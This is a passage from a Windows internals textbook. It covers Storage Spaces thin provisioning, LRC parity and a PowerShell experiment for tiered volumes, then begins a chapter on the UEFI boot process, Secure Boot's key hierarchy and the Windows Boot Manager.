locate only the space that is actually used. In this way, it’s possible to create virtual disks that are much
larger than the underlying storage cluster. When available space gets low, a system administrator can
dynamically add disks to the cluster. Storage Spaces automatically includes the new physical disks to
the pool and redistributes the allocated blocks between the new disks.
Storage Spaces supports thin provisioned disks through slabs. A slab is a unit of allocation, which is
similar to the ReFS container concept, but applied to a lower-level stack: the slab is an allocation unit of
a virtual disk and not a file system concept. By default, each slab is 256 MB in size, but it can be bigger if the underlying storage cluster allows it (i.e., if the cluster has a lot of available space). The Spaces core keeps track of each slab in the virtual disk and can dynamically allocate or free slabs by using its
own allocator. It’s worth noting that each slab is a point of reliability: in mirrored and parity configura-
tions, the data stored in a slab is automatically replicated through the entire cluster.
When a thin provisioned disk is created, a size still needs to be specified. The virtual disk size will be
used by the file system with the goal of correctly formatting the new volume and creating the needed
metadata. When the volume is ready, Spaces allocates slabs only when new data is actually written to
the disk—a method called allocate-on-write. Note that the provisioning type is not visible to the file
system that resides on top of the volume, so the file system has no idea whether the underlying disk is
thin or fixed provisioned.
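Allocate-on-write can be sketched as a lazy mapping from virtual slab indexes to pool slabs. The following Python model is an illustration only (the names and structure are assumptions, not the Spaces implementation); it shows how a large virtual disk consumes pool space only as slabs are first written:

```python
SLAB_SIZE = 256 * 1024 * 1024  # default slab size: 256 MB

class ThinDisk:
    """Toy model of a thin-provisioned virtual disk: pool slabs are
    only bound to virtual slabs when a write first touches them."""

    def __init__(self, virtual_size, pool_slabs):
        self.virtual_size = virtual_size
        self.pool_slabs = pool_slabs   # free slabs left in the cluster
        self.mapping = {}              # virtual slab index -> backing slab

    def write(self, offset, length):
        if offset + length > self.virtual_size:
            raise ValueError("write beyond the virtual disk size")
        first = offset // SLAB_SIZE
        last = (offset + length - 1) // SLAB_SIZE
        for idx in range(first, last + 1):
            if idx not in self.mapping:        # allocate-on-write
                if self.pool_slabs == 0:
                    raise RuntimeError("storage pool exhausted")
                self.pool_slabs -= 1
                self.mapping[idx] = object()   # stand-in for a real slab

    def allocated_bytes(self):
        return len(self.mapping) * SLAB_SIZE
```

A 1-TB virtual disk backed by only a few free slabs works fine until writes actually touch more slabs than the pool can supply, which is exactly when an administrator would add disks to the cluster.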
Spaces gets rid of any single point of failure by making use of mirroring and parity. In big storage clusters composed of multiple disks, RAID 6 is usually employed as the parity solution. RAID 6 allows the failure of a maximum of two underlying devices and supports seamless reconstruction of data without any user intervention. Unfortunately, when the cluster encounters a single (or double) point of failure, the time needed to reconstruct the array (mean time to repair, or MTTR) is high and often causes serious performance penalties.

Spaces solves the problem by using a local reconstruction code (LRC) algorithm, which reduces the number of reads needed to reconstruct a big disk array, at the cost of one additional parity unit. As shown in Figure 11-96, the LRC algorithm does so by dividing the disk array into different rows and adding a parity unit for each row. If a disk fails, only the other disks of the same row need to be read. As a result, reconstruction of a failed array is much faster and more efficient.
[Figure: comparison of the data/parity unit layout in RAID 6 (data units D0 through D5 protected by global parity units P0 and P1) and in LRC (the same data units split into rows, each row protected by its own parity unit).]
FIGURE 11-96 RAID 6 and LRC parity.
Figure 11-96 shows a comparison between the typical RAID 6 parity implementation and the LRC implementation on a cluster composed of eight drives. In the RAID 6 configuration, if one or two disks fail, the other six disks must be read to properly reconstruct the missing information; in LRC, only the disks that belong to the same row as the failing disk need to be read.
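The read-count advantage can be shown with a small model. The following Python sketch is a simplification (the row layout is assumed for illustration and is not the exact Spaces on-disk format); it counts the reads needed to rebuild one failed unit under each scheme:

```python
def raid6_reads(data_units):
    """RAID 6 sketch: rebuilding one failed unit requires reading as
    many surviving units as there are data units in the stripe."""
    return data_units

def lrc_reads(rows, failed_unit):
    """LRC sketch: only the surviving members of the failed unit's row
    (its data units plus the row's local parity) are read."""
    for row in rows:
        if failed_unit in row:
            return len(row) - 1
    raise ValueError("unit not found in any row")

# Eight-drive example in the spirit of Figure 11-96: six data units with
# two global parities (RAID 6) versus two rows of three data units, each
# with its own local parity (LRC).
lrc_rows = [["D0", "D2", "D4", "P1"], ["D1", "D3", "D5", "P2"]]
print(raid6_reads(6))             # 6 reads to rebuild one failed unit
print(lrc_reads(lrc_rows, "D3"))  # 3 reads: only D3's row is touched
```

Halving the reads per rebuild is what drives the MTTR improvement the text describes, at the cost of the extra per-row parity unit.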
EXPERIMENT: Creating tiered volumes

Storage Spaces is supported natively by both server and client editions of Windows 10. You can create tiered disks using the graphical user interface, or you can also use Windows PowerShell. In this experiment, you will create a virtual tiered disk, and you will need a workstation that, other than the Windows boot disk, also has an empty SSD and an empty classical rotating disk (HDD). For testing purposes, you can emulate a similar configuration by using Hyper-V. In that case, one virtual disk file should reside on an SSD, whereas the other should reside on a classical rotating disk.

First, you need to open an administrative Windows PowerShell by right-clicking the Start menu icon and selecting Windows PowerShell (Admin). Verify that the system has already identified the type of the installed disks:

PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool

DeviceId FriendlyName            UniqueID                      Size MediaType CanPool
-------- ------------            --------                      ---- --------- -------
2        Samsung SSD 960 EVO 1TB eui.0025385C61B074F7 1000204886016 SSD       False
0        Micron 1100 SATA 512GB  500A071516EBA521      512110190592 SSD       True
1        TOSHIBA DT01ACA200      500003F9E5D69494     2000398934016 HDD       True
In the preceding example, the system has already identified two SSDs and one classical rotating hard disk. You should verify that your empty disks have the CanPool value set to True. Otherwise, it means that the disk contains valid partitions that need to be deleted. If you're testing in a virtualized environment, the system is often not able to correctly identify the media type of the underlying disk.
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool

DeviceId FriendlyName      UniqueID                                  Size MediaType   CanPool
-------- ------------      --------                                  ---- ---------   -------
2        Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B  137438953472 Unspecified True
1        Msft Virtual Disk 60022480170766A9A808A30797285D77 1099511627776 Unspecified True
0        Msft Virtual Disk 6002248048976A586FE149B00A43FC73  274877906944 Unspecified False
In this case, you should manually specify the type of disk by using the command
Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[<IDX>].UniqueID -MediaType <Type>,
where IDX is the row number in the previous output and MediaType is SSD or HDD, depending
on the disk type. For example:
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[0].UniqueID -MediaType SSD
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[1].UniqueID -MediaType HDD
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool

DeviceId FriendlyName      UniqueID                                  Size MediaType   CanPool
-------- ------------      --------                                  ---- ---------   -------
2        Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B  137438953472 SSD         True
1        Msft Virtual Disk 60022480170766A9A808A30797285D77 1099511627776 HDD         True
0        Msft Virtual Disk 6002248048976A586FE149B00A43FC73  274877906944 Unspecified False
At this stage, you need to create the storage pool, which is going to contain all the physical disks that will compose the new virtual disk. You will then create the storage tiers. In this example, we name the storage pool DefaultPool:

PS C:\> New-StoragePool -StorageSubSystemId (Get-StorageSubSystem).UniqueId -FriendlyName
DefaultPool -PhysicalDisks (Get-PhysicalDisk -CanPool $true)

FriendlyName OperationalStatus HealthStatus IsPrimordial IsReadOnly    Size AllocatedSize
------------ ----------------- ------------ ------------ ---------- ------- -------------
DefaultPool  OK                Healthy      False        False      1.12 TB        512 MB

PS C:\> Get-StoragePool DefaultPool | New-StorageTier -FriendlyName SSD -MediaType SSD
...
PS C:\> Get-StoragePool DefaultPool | New-StorageTier -FriendlyName HDD -MediaType HDD
...
Finally, we can create the virtual tiered volume by assigning it a name and specifying the correct size of each tier. In this example, we create a tiered volume named TieredVirtualDisk composed of a 128-GB performance tier and a 1,000-GB capacity tier:

PS C:\> $SSD = Get-StorageTier -FriendlyName SSD
PS C:\> $HDD = Get-StorageTier -FriendlyName HDD
PS C:\> Get-StoragePool DefaultPool | New-VirtualDisk -FriendlyName "TieredVirtualDisk"
-ResiliencySettingName "Simple" -StorageTiers $SSD, $HDD -StorageTierSizes 128GB, 1000GB
...
PS C:\> Get-VirtualDisk | FT FriendlyName, OperationalStatus, HealthStatus, Size, FootprintOnPool

FriendlyName      OperationalStatus HealthStatus          Size FootprintOnPool
------------      ----------------- ------------          ---- ---------------
TieredVirtualDisk OK                Healthy      1202590842880   1203664584704
After the virtual disk is created, you need to create the partitions and format the new volume
through standard means (such as by using the Disk Management snap-in or the Format tool).
After you complete volume formatting, you can verify whether the resulting volume is really a
tiered volume by using the fsutil.exe tool:
PS E:\> fsutil tiering regionList e:
Total Number of Regions for this volume: 2
Total Number of Regions returned by this operation: 2
Region # 0:
Tier ID: {448ABAB8-F00B-42D6-B345-C8DA68869020}
Name: TieredVirtualDisk-SSD
Offset: 0x0000000000000000
Length: 0x0000001dff000000
Region # 1:
Tier ID: {16A7BB83-CE3E-4996-8FF3-BEE98B68EBE4}
Name: TieredVirtualDisk-HDD
Offset: 0x0000001dff000000
Length: 0x000000f9ffe00000
Conclusion
Windows supports a wide variety of file system formats accessible to both the local system and remote
clients. The file system filter driver architecture provides a clean way to extend and augment file system
access, and both NTFS and ReFS provide a reliable, secure, scalable file system format for local file
system storage. Although ReFS is a relatively new file system, and implements some advanced features
designed for big server environments, NTFS was also updated with support for new device types and
new features (like the POSIX delete, online checkdisk, and encryption).
The cache manager provides a high-speed, intelligent mechanism for reducing disk I/O and increas-
ing overall system throughput. By caching on the basis of virtual blocks, the cache manager can perform
intelligent read-ahead, including on remote, networked file systems. By relying on the global memory
manager’s mapped file primitive to access file data, the cache manager can provide a special fast I/O
mechanism to reduce the CPU time required for read and write operations, while also leaving all matters
related to physical memory management to the Windows memory manager, thus reducing code dupli-
cation and increasing efficiency.
Through DAX and PM disk support, Storage Spaces and Storage Spaces Direct, tiered volumes, and SMR disk compatibility, Windows continues to be at the forefront of next-generation storage architectures designed for high availability, reliability, performance, and cloud-level scale.
In the next chapter, we look at startup and shutdown in Windows.
CHAPTER 12
Startup and shutdown
In this chapter, we describe the steps required to boot Windows and the options that can affect system
startup. Understanding the details of the boot process will help you diagnose problems that can
arise during a boot. We discuss the details of UEFI firmware and the improvements it brings compared to the legacy BIOS. We present the role of the Boot Manager, Windows Loader,
NT kernel, and all the components involved in standard boots and in the new Secure Launch process,
which detects any kind of attack on the boot sequence. Then we explain the kinds of things that can
go wrong during the boot process and how to resolve them. Finally, we explain what occurs during an
orderly system shutdown.
Boot process
In describing the Windows boot process, we start with the installation of Windows and proceed through
the execution of boot support files. Device drivers are a crucial part of the boot process, so we explain
how they control the point in the boot process at which they load and initialize. Then we describe how the
executive subsystems initialize and how the kernel launches the user-mode portion of Windows by start-
ing the Session Manager process (Smss.exe), which starts the initial two sessions (session 0 and session 1).
Along the way, we highlight the points at which various on-screen messages appear to help you correlate
the internal process with what you see when you watch Windows boot.
The early phases of the boot process differ significantly on systems with an Extensible Firmware
Interface (EFI) versus the old systems with a BIOS (basic input/output system). EFI is a newer standard
that does away with much of the legacy 16-bit code that BIOS systems use and allows the loading of
preboot programs and drivers to support the operating system loading phase. EFI 2.0, which is known
as Unified EFI, or UEFI, is used by the vast majority of machine manufacturers. The next sections de-
scribe the portion of the boot process specific to UEFI-based machines.
To support these different firmware implementations, Windows provides a boot architecture that
abstracts many of the differences away from users and developers to provide a consistent environment
and experience regardless of the type of firmware used on the installed system.
The UEFI boot
The Windows boot process doesn’t begin when you power on your computer or press the reset but-
ton. It begins when you install Windows on your computer. At some point during the execution of the
Windows Setup program, the system’s primary hard disk is prepared in a way that both the Windows
Boot Manager and the UEFI firmware can understand. Before we get into what the Windows Boot
Manager code does, let’s have a quick look at the UEFI platform interface.
The UEFI is a set of software that provides the first basic programmatic interface to the platform.
With the term platform, we refer to the motherboard, chipset, central processing unit (CPU), and other
components that compose the machine “engine.” As Figure 12-1 shows, the UEFI specifications provide
four basic services that run in most of the available CPU architectures (x86, ARM, and so on). We use the
x86-64 architecture for this quick introduction:
- Power on: When the platform is powered on, the UEFI Security Phase handles the platform restart event, verifies the Pre EFI Initialization modules' code, and switches the processor from 16-bit real mode to 32-bit flat mode (still with no paging support).

- Platform initialization: The Pre EFI Initialization (PEI) phase initializes the CPU, the UEFI core's code, and the chipset, and finally passes control to the Driver Execution Environment (DXE) phase. The DXE phase is the first code that runs entirely in full 64-bit mode. Indeed, the last PEI module, called DXE IPL, switches the execution mode to 64-bit long mode. This phase searches inside the firmware volume (stored in the system SPI flash chip) and executes each peripheral's startup drivers (called DXE drivers). Secure Boot, an important security feature that we talk about later in this chapter in the "Secure Boot" section, is implemented as a UEFI DXE driver.

- OS boot: After the UEFI DXE phase ends, execution control is handed to the Boot Device Selection (BDS) phase. This phase is responsible for implementing the UEFI Boot Loader. The UEFI BDS phase locates and executes the Windows UEFI Boot Manager that the Setup program has installed.

- Shutdown: The UEFI firmware implements some runtime services (available even to the OS) that help in powering off the platform. Windows doesn't normally make use of these functions (relying instead on the ACPI interfaces).
[Figure: the UEFI phases from power on to shutdown: Security (SEC), Pre EFI Initialization (PEI), Driver Execution Environment (DXE), Boot Device Selection (BDS), Transient System Load (TSL), Run Time (RT), and After Life (AL). The PEI phase performs processor, chipset, and board initialization; the DXE phase dispatches device, bus, and service drivers; the BDS phase runs the boot manager, which hands control through the UEFI interface to the transient and final OS boot loaders.]
FIGURE 12-1 The UEFI framework.
Describing the entire UEFI framework is beyond the scope of this book. After the UEFI BDS phase ends,
the firmware still owns the platform, making available the following services to the OS boot loader:
- Boot services: Provide basic functionality to the boot loader and other EFI applications, such as basic memory management, synchronization, textual and graphical console I/O, and disk and file I/O. Boot services implement some routines able to enumerate and query the installed "protocols" (EFI interfaces). These kinds of services are available only while the firmware owns the platform and are discarded from memory after the boot loader has called the ExitBootServices EFI runtime API.

- Runtime services: Provide date and time services, capsule update (firmware upgrading), and methods able to access NVRAM data (such as UEFI variables). These services are still accessible while the operating system is fully running.

- Platform configuration data: System ACPI and SMBIOS tables are always accessible through the UEFI framework.
The UEFI Boot Manager can read and write from computer hard disks and understands basic file
systems like FAT, FAT32, and El Torito (for booting from a CD-ROM). The specifications require that the
boot hard disk be partitioned through the GPT (GUID partition table) scheme, which uses GUIDs to
identify different partitions and their roles in the system. The GPT scheme overcomes all the limitations
of the old MBR scheme and allows a maximum of 128 partitions, using a 64-bit LBA addressing mode
(resulting in huge partition size support). Each partition is identified using a unique 128-bit GUID value. Another GUID is used to identify the partition type. While UEFI defines only three partition types, each OS vendor defines its own partition GUID types. The UEFI standard requires at least one EFI system partition, formatted with a FAT32 file system.
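To see why 64-bit LBA addressing effectively removes the old MBR size limits, a quick back-of-the-envelope computation (assuming the common 512-byte logical sector size) gives the maximum addressable space:

```python
SECTOR_SIZE = 512          # bytes; the common logical sector size
MAX_LBA_COUNT = 2 ** 64    # number of addressable logical blocks

max_bytes = MAX_LBA_COUNT * SECTOR_SIZE
print(max_bytes == 2 ** 73)    # True: 512 * 2^64 = 2^73 bytes
print(max_bytes // 2 ** 70)    # 8, i.e., 8 ZiB of addressable space
```

Compare this with MBR's 32-bit LBA limit of 2 TiB at the same sector size, which modern disks routinely exceed.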
The Windows Setup application initializes the disk and usually creates at least four partitions:
- The EFI system partition, where it copies the Windows Boot Manager (Bootmgfw.efi), the memory test application (Memtest.efi), the system lockdown policies (for Device Guard-enabled systems, Winsipolicy.p7b), and the boot resource file (Bootres.dll).

- A recovery partition, where it stores the files needed to boot the Windows Recovery environment in case of startup problems (boot.sdi and Winre.wim). This partition is formatted using the NTFS file system.

- A Windows reserved partition, which the Setup tool uses as a fast, recoverable scratch area for storing temporary data. Furthermore, some system tools use the reserved partition for remapping damaged sectors in the boot volume. (The reserved partition does not contain any file system.)

- A boot partition (the partition on which Windows is installed, which is not typically the same as the system partition), where the boot files are located. This partition is formatted using NTFS, the only supported file system that Windows can boot from when installed on a fixed disk.
The Windows Setup program, after placing the Windows files on the boot partition, copies the boot manager to the EFI system partition and hides the boot partition content from the rest of the system. The
UEFI specification defines some global variables that can reside in NVRAM (the system’s nonvolatile
RAM) and are accessible even in the runtime phase when the OS has gained full control of the platform
(some other UEFI variables can even reside in the system RAM). The Windows Setup program configures the UEFI platform for booting the Windows Boot Manager through the settings of some UEFI variables (Boot000X, where X is a unique number depending on the boot load-option number, and BootOrder). When the system reboots after setup ends, the UEFI Boot Manager is automatically
able to execute the Windows Boot Manager code.
Table 12-1 summarizes the files involved in the UEFI boot process. Figure 12-2 shows an example of a
hard disk layout, which follows the GPT partition scheme. (Files located in the Windows boot partition
are stored in the \Windows\System32 directory.)
TABLE 12-1 UEFI boot process components

- bootmgfw.efi (EFI system partition): Reads the Boot Configuration Database (BCD); if required, presents the boot menu and allows execution of preboot programs such as the Memory Test application (Memtest.efi).
- Winload.efi (Windows boot partition): Loads Ntoskrnl.exe and its dependencies (SiPolicy.p7b, hvloader.dll, hvix64.exe, Hal.dll, Kdcom.dll, Ci.dll, Clfs.sys, Pshed.dll) and boot-start device drivers.
- Winresume.efi (Windows boot partition): If resuming after a hibernation state, resumes from the hibernation file (Hiberfil.sys) instead of performing a typical Windows load.
- Memtest.efi (EFI system partition): If selected from the Boot Immersive Menu (or from the Boot Manager), starts up and provides a graphical interface for scanning memory and detecting damaged RAM.
- Hvloader.dll (Windows boot partition): If detected by the boot manager and properly enabled, this module is the hypervisor launcher (hvloader.efi in the previous Windows version).
- Hvix64.exe or hvax64.exe (Windows boot partition): The Windows Hypervisor (Hyper-V). Depending on the processor architecture, this file could have different names. It's the basic component for Virtualization Based Security (VBS).
- Ntoskrnl.exe (Windows boot partition): Initializes executive subsystems and boot and system-start device drivers, prepares the system for running native applications, and runs Smss.exe.
- Securekernel.exe (Windows boot partition): The Windows Secure Kernel. Provides the kernel-mode services for the secure VTL 1 world and some basic communication facilities with the normal world (see Chapter 9, "Virtualization Technologies").
- Hal.dll (Windows boot partition): Kernel-mode DLL that interfaces Ntoskrnl and drivers to the hardware. It also acts as a driver for the motherboard, supporting soldered components that are not otherwise managed by another driver.
- Smss.exe (Windows boot partition): The initial instance starts a copy of itself to initialize each session. The session 0 instance loads the Windows subsystem driver (Win32k.sys) and starts the Windows subsystem process (Csrss.exe) and the Windows initialization process (Wininit.exe). All other per-session instances start a Csrss and Winlogon process.
- Wininit.exe (Windows boot partition): Starts the service control manager (SCM), the Local Security Authority process (LSASS), and the local session manager (LSM). Initializes the rest of the registry and performs user-mode initialization tasks.
- Winlogon.exe (Windows boot partition): Coordinates log-on and user security; launches Bootim and LogonUI.
- Logonui.exe (Windows boot partition): Presents the interactive logon dialog screen.
- Bootim.exe (Windows boot partition): Presents the graphical interactive boot menu.
- Services.exe (Windows boot partition): Loads and initializes auto-start device drivers and Windows services.
- TcbLaunch.exe (Windows boot partition): Orchestrates the Secure Launch of the operating system on a system that supports the new Intel TXT technology.
- TcbLoader.dll (Windows boot partition): Contains the Windows Loader code that runs in the context of the Secure Launch.
[Figure: a sample GPT hard disk layout from LBA 0 to LBA z: the protective MBR and primary GPT at the start of the disk, followed by the UEFI system partition, the Windows recovery partition, the reserved partition, and the Windows boot partition, with the backup GPT at the end of the disk.]
FIGURE 12-2 Sample UEFI hard disk layout.
Another of Setup’s roles is to prepare the BCD, which on UEFI systems is stored in the \EFI\Microsoft
\Boot\BCD file on the root directory of the system volume. This file contains options for starting
the version of Windows that Setup installs and any preexisting Windows installations. If the BCD
already exists, the Setup program simply adds new entries relevant to the new installation. For more
information on the BCD, see Chapter 10, “Management, diagnostics, and tracing.”
All the UEFI specifications, which include the PEI and BDS phase, secure boot, and many other
concepts, are available at https://uefi.org/specifications.
The BIOS boot process
Due to space issues, we don’t cover the old BIOS boot process in this edition of the book. The complete
description of the BIOS preboot and boot process is in Part 2 of the previous edition of the book.
Secure Boot
As described in Chapter 7 of Part 1, Windows was designed to protect against malware. All the old BIOS systems were vulnerable to Advanced Persistent Threats (APTs) that used a bootkit to achieve stealth and code execution. A bootkit is a particular type of malicious software that runs before the Windows Boot Manager and allows the main infection module to run without being detected by
antivirus solutions. Initial parts of the BIOS bootkit normally reside in the Master Boot Record (MBR)
or Volume Boot Record (VBR) sector of the system hard disk. In this way, the old BIOS systems, when
switched on, execute the bootkit code instead of the main OS code. The original OS boot code is encrypted and stored in other areas of the hard disk and is usually executed in a later stage by the malicious code. This type of bootkit was even able to modify the OS code in memory during any Windows
boot phase.
As demonstrated by security researchers, the first releases of the UEFI specification were still vul-
nerable to this problem because the firmware, bootloader, and other components were not verified.
So, an attacker who has access to the machine could tamper with these components and replace the
bootloader with a malicious one. Indeed, any EFI application (executable files that follow the portable
executable or terse executable file format) correctly registered in the relative boot variable could have
been used for booting the system. Furthermore, even the DXE drivers were not correctly verified, al-
lowing the injection of a malicious EFI driver in the SPI flash. Windows couldn’t correctly identify the
alteration of the boot process.
This problem led the UEFI consortium to design and develop the Secure Boot technology. Secure Boot is a feature of UEFI that ensures that each component loaded during the boot process is digitally signed and validated. Secure Boot makes sure that the PC boots using only software that is trusted by the PC manufacturer or the user. In Secure Boot, the firmware is responsible for the verification of all the components (DXE drivers, UEFI boot managers, loaders, and so on) before they are loaded. If a component doesn't pass the validation, an error message is shown to the user and the boot process is aborted.
The verification is performed through the use of public key algorithms (like RSA) for digital signing, against a database of accepted and refused certificates (or hashes) present in the UEFI firmware. In this kind of algorithm, two different keys are employed:
■	A public key is used to decrypt an encrypted digest (a digest is a hash of the executable file binary data). This key is stored in the digital signature of the file.
■	The private key is used to encrypt the hash of the binary executable file and is stored in a secure and secret location.
The digital signing of an executable file consists of three phases:
1.	Calculate the digest of the file content using a strong hashing algorithm, like SHA256. A strong hashing algorithm should produce a message digest that is a unique (and relatively small) representation of the complete initial data (a bit like a sophisticated checksum). Hashing algorithms are one-way functions: it's impossible to derive the whole file from the digest.
2.	Encrypt the calculated digest with the private portion of the key.
3.	Store the encrypted digest, the public portion of the key, and the name of the hashing algorithm in the digital signature of the file.
In this way, when the system wants to verify and validate the integrity of the file, it recalculates the file hash and compares it against the digest decrypted from the digital signature. Nobody except the owner of the private key can modify or alter the encrypted digest stored in the digital signature.
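The three signing phases, and the matching verification step, can be sketched with textbook RSA and SHA-256. This is a toy illustration with deliberately tiny key parameters, not how Authenticode or UEFI image signing is actually implemented:

```python
import hashlib

# Toy RSA key (p=61, q=53): illustrative only, far too small to be secure.
N, E, D = 3233, 17, 2753  # modulus, public exponent, private exponent

def sign(data: bytes) -> int:
    # Phase 1: digest the file content with a strong hash (SHA-256).
    # The digest is reduced mod N only because the toy key is tiny.
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big") % N
    # Phase 2: encrypt the digest with the private portion of the key.
    # Phase 3 would store this value, the public key, and the hash
    # algorithm name inside the file's digital signature.
    return pow(digest, D, N)

def verify(data: bytes, signature: int) -> bool:
    # Recompute the digest and compare it against the digest
    # decrypted (with the public key) from the signature.
    digest = int.from_bytes(hashlib.sha256(data).digest(), "big") % N
    return pow(signature, E, N) == digest
```

Only the holder of the private exponent can produce a signature that decrypts back to the correct digest, while anyone holding the public pair can verify it.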
CHAPTER 12
Startup and shutdown
783
This simplified model can be extended to create a chain of certificates, each one trusted by the firmware. Indeed, if a public key located in a specific certificate is unknown to the firmware, but the certificate is itself signed by a trusted entity (an intermediate or root certificate), the firmware can assume that the inner public key is trusted as well. This mechanism is shown in Figure 12-3 and is called the chain of trust. It relies on the fact that a digital certificate (used for code signing) can be signed with the private key corresponding to another trusted higher-level certificate (a root or intermediate certificate). The model is simplified here because a complete description of all the details is outside the scope of this book.
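The chain-of-trust check can be modeled as a simple upward walk. The certificate representation and the helper callbacks (issuer_of, verify_signature) below are hypothetical placeholders for illustration, not UEFI APIs:

```python
def chain_is_trusted(cert, issuer_of, verify_signature, trust_store):
    """Walk a certificate chain upward until a firmware-trusted anchor.

    Each hop must carry a valid signature made by its issuer, and the
    walk must end at a certificate already present in the trust store.
    """
    seen = set()
    while cert is not None and cert not in seen:  # guard against loops
        if cert in trust_store:
            return True  # reached a trusted root or intermediate
        seen.add(cert)
        issuer = issuer_of(cert)
        if issuer is None or not verify_signature(cert, issuer):
            return False  # unsigned or broken link in the chain
        cert = issuer
    return False
```

With this shape, trusting an intermediate certificate is enough: any end-entity certificate that validly chains up to it is accepted without being individually enrolled in the firmware.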
FIGURE 12-3 A simplified representation of the chain of trust: an end-entity certificate is signed by an intermediate CA certificate, which in turn is signed by a self-signed root certificate. Each certificate carries its owner's name, the owner's public key, the issuer's name, and the issuer's signature.
The allowed and revoked UEFI certificates and hashes establish a hierarchy of trust through the entities shown in Figure 12-4, which are stored in UEFI variables:
■	Platform key (PK) The platform key represents the root of trust and is used to protect the key exchange key (KEK) database. The platform vendor puts the public portion of the PK into the UEFI firmware during manufacturing. Its private portion stays with the vendor.
■	Key exchange key (KEK) The key exchange key database contains trusted certificates that are allowed to modify the allowed signature database (DB), disallowed signature database (DBX), or timestamp signature database (DBT). The KEK database usually contains certificates of the operating system vendor (OSV) and is secured by the PK.
Hashes and signatures used to verify bootloaders and other pre-boot components are stored in three different databases. The allowed signature database (DB) contains hashes of specific binaries, or certificates (or their hashes) that were used to generate the code-signing certificates that have signed bootloaders and other pre-boot components (following the chain-of-trust model). The disallowed signature database (DBX) contains the hashes of specific binaries or certificates (or their hashes) that were compromised and/or revoked. The timestamp signature database (DBT) contains timestamping certificates used when signing bootloader images. All three databases are locked from editing by the KEK.
FIGURE 12-4 The certificate chain of trust used in UEFI Secure Boot: the platform key (PK) secures the key exchange key (KEK) database, which in turn secures the allowed signatures database (DB), the revoked signatures database (DBX), and the timestamping database (DBT).
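The way DB and DBX decide whether a boot component may run can be sketched as a small decision function. This is a simplified policy model, assuming revocation always wins; it is not actual firmware code:

```python
def secure_boot_verdict(image_hash, signer_cert, db, dbx):
    # The forbidden database (DBX) is consulted first: a revoked hash
    # or certificate rejects the image even if DB would allow it.
    if image_hash in dbx["hashes"] or signer_cert in dbx["certs"]:
        return "DENY"
    # Otherwise the image must match an allowed hash, or be signed by
    # a certificate chaining to an entry in the allowed database (DB).
    if image_hash in db["hashes"] or signer_cert in db["certs"]:
        return "ALLOW"
    return "DENY"  # unknown or unsigned components do not boot
```

The default-deny last line is what distinguishes Secure Boot from a simple blocklist: a component absent from both databases is refused, not given the benefit of the doubt.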
To properly seal Secure Boot keys, the firmware should not allow their update unless the entity
attempting the update can prove (with a digital signature on a specified payload, called the authenti-
cation descriptor) that they possess the private part of the key used to create the variable. This mecha-
nism is implemented in UEFI through the Authenticated Variables. At the time of this writing, the UEFI
specifications allow only two types of signing keys: X509 and RSA2048. An Authenticated Variable may
be cleared by writing an empty update, which must still contain a valid authentication descriptor. When
an Authenticated Variable is first created, it stores both the public portion of the key that created it and
the initial value for the time (or a monotonic count) and will accept only subsequent updates signed
with that key and which have the same update type. For example, the KEK variable is created using the
PK and can be updated only by an authentication descriptor signed with the PK.
Note The way in which the UEFI firmware uses the Authenticated Variables in Secure Boot
environments could lead to some confusion. Indeed, only the PK, KEK, and signature databases are stored using Authenticated Variables. The other UEFI boot variables, which store
boot configuration data, are still regular runtime variables. This means that in a Secure Boot
environment, a user is still able to update or change the boot configuration (modifying even
the boot order) without any problem. This is not an issue, because the secure verification
is always made on every kind of boot application (regardless of its source or order). Secure
Boot is not designed to prevent the modification of the system boot configuration.
The Windows Boot Manager
As discussed previously, the UEFI firmware reads and executes the Windows Boot Manager (Bootmgfw.efi).
The EFI firmware transfers control to Bootmgr in long mode with paging enabled, and the memory space defined by the UEFI memory map is mapped one to one. So, unlike on BIOS systems, there's no need to switch execution context. The Windows Boot Manager is indeed the first application that's invoked when starting or resuming the Windows OS from a completely off power state or from hibernation (S4 power state). The Windows Boot Manager has been completely redesigned starting from Windows Vista, with the following goals:
■	Support the boot of different operating systems that employ complex and various boot technologies.
■	Separate the OS-specific startup code into its own boot application (named Windows Loader) and the Resume application (Winresume).
■	Isolate and provide common boot services to the boot applications. This is the role of the boot libraries.
Even though the final goal of the Windows Boot Manager seems obvious, its entire architecture is
complex. From now on, we use the term boot application to refer to any OS loader, such as the Windows
Loader and other loaders. Bootmgr has multiple roles, such as the following:
■	Initializes the boot logger and the basic system services needed for the boot application (which will be discussed later in this section)
■	Initializes security features like Secure Boot and Measured Boot, loads their system policies, and verifies its own integrity
■	Locates, opens, and reads the Boot Configuration Data store
■	Creates a “boot list” and shows a basic boot menu (if the boot menu policy is set to Legacy)
■	Manages the TPM and the unlocking of BitLocker-encrypted drives (showing the BitLocker unlock screen and providing a recovery method in case of problems getting the decryption key)
■	Launches a specific boot application and manages the recovery sequence in case the boot has failed (Windows Recovery Environment)
One of the first things performed is the configuration of the boot logging facility and initialization of
the boot libraries. Boot applications include a standard set of libraries that are initialized at the start of
the Boot Manager. Once the standard boot libraries are initialized, their core services are available to all boot applications. These services include a basic memory manager (that supports address translation and page and heap allocation), firmware parameters (like the boot device and the boot manager
entry in the BCD), an event notification system (for Measured Boot), time, boot logger, crypto modules,
the Trusted Platform Module (TPM), network, display driver, and I/O system (and a basic PE Loader). The
reader can imagine the boot libraries as a special kind of basic hardware abstraction layer (HAL) for the
Boot Manager and boot applications. In the early stages of library initialization, the System Integrity
boot library component is initialized. The goal of the System Integrity service is to provide a platform
for reporting and recording security-relevant system events, such as loading of new code, attaching a
debugger, and so on. This is achieved using functionality provided by the TPM and is used especially for
Measured Boot. We describe this feature later in the chapter in the “Measured Boot” section.
To properly execute, the Boot Manager initialization function (BmMain) needs a data structure
called Application Parameters that, as the name implies, describes its startup parameters (like the
Boot Device, BCD object GUID, and so on). To compile this data structure, the Boot Manager uses the
EFI firmware services with the goal of obtaining the complete relative path of its own executable and
getting the startup load options stored in the active EFI boot variable (BOOT000X). The EFI specifica-
tions dictate that an EFI boot variable must contain a short description of the boot entry, the complete
